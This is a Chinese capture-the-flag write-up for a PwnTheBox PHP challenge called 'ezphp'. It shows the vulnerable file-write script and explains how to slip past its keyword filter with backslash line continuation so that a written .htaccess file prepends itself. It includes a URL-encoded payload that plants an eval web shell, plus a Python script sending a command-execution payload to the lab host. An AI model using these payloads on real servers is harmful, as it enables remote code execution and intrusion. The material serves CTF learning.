[PHP知识库]PwnTheBox(web篇)---ezphp

PwnTheBox(web篇)—ezphp

题目解析

<?php
    $files = scandir('./');  //访问的时候清除该目录下除了index.php文件以外的所有文件
    foreach($files as $file) {   
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    include_once("fl3g.php");
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];  //过滤文件内容,内容中不能出现以下字符
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename']; //过滤文件名,不能出现字母和,以外的字符
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir('./');  //清除该目录下除了index.php文件以外的所有文件
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nJust one chance"); //写入get传入的参数到文件
?>

有两次unlink，而且文件名不允许/的存在，所以想要避开unlink的删除，是基本不可能的了。

主要就是两个正则，而且只有一次写的机会，因为想要第二次写的话，就会把第一次写的东西给清了

文件名的正则绕不过去，那就只能考虑绕content的正则了，

只要关键字不被匹配到就能过，所以思路就是把关键字拆开，

而且新建的php文件都不解析，所以首先想到的就是写一个.htaccess文件。

写.Htaccess文件的困难主要在于过滤了file,on,type之类的，

而且文件后追加了\nJust one chance，没有办法注释的话

.htaccess文件会出错，所以所有的功夫都用在绕过这两个点上。

写在.htaccess文件里

将代码写在htaccess文件里，利用php_value auto_prepend_file .htaccess

让php文件包含htaccess文件，htaccess里的代码会执行

所以直接用一句话的方式简单粗暴一些，可以以利用404、403等页面来触发

php_value auto_prepend_file ".htaccess"
ErrorDocument 404 "<?php var_dump(eval($_POST[1]));?>
Just one chance

关键字拆开

利用添加 \ 的方法来换行书写，利用这种方法来处理过滤的关键字，输出的代码恰好会有不可见字符

正则匹配的时候是分开的，而逻辑上又是一行拼接在一起的一个完整的关键字，

所以可以绕过过滤，例如file可以通过如下方式绕过

而对于\nJust one chance也是利用同样的绕过方法，在内容末尾加上#\来注释后面的内容。

只有一次写的机会自然不能用AddType application/x-httpd-php .xxx的方式，这样需要再写一个文件进去。

payload

https://url/?filename=.htaccess&content=php_value%20auto_prepend_fi\%0Ale%20%22.htaccess%22%0AErrorDocument%20404%20%22%3C?php%20var_dump(eval($_POST[1]));?%3E\\

蚁剑连接后查看写入文件

flag 在这里…

一键直达脚本

import requests

url = 'https://1360-891dff64-11d3-4d98-a96b-b551ea11035e.do-not-trust.hacking.run/'
payload = '?filename=.htaccess&content=php_value auto_prepend_fi\\%0Ale ".htaccess"\n%23<?php system(\'cat /f* \');?>\\'
r = requests.get(url+payload)
print(r.text)

创作打卡挑战赛

赢取流量/现金/CSDN周边激励大奖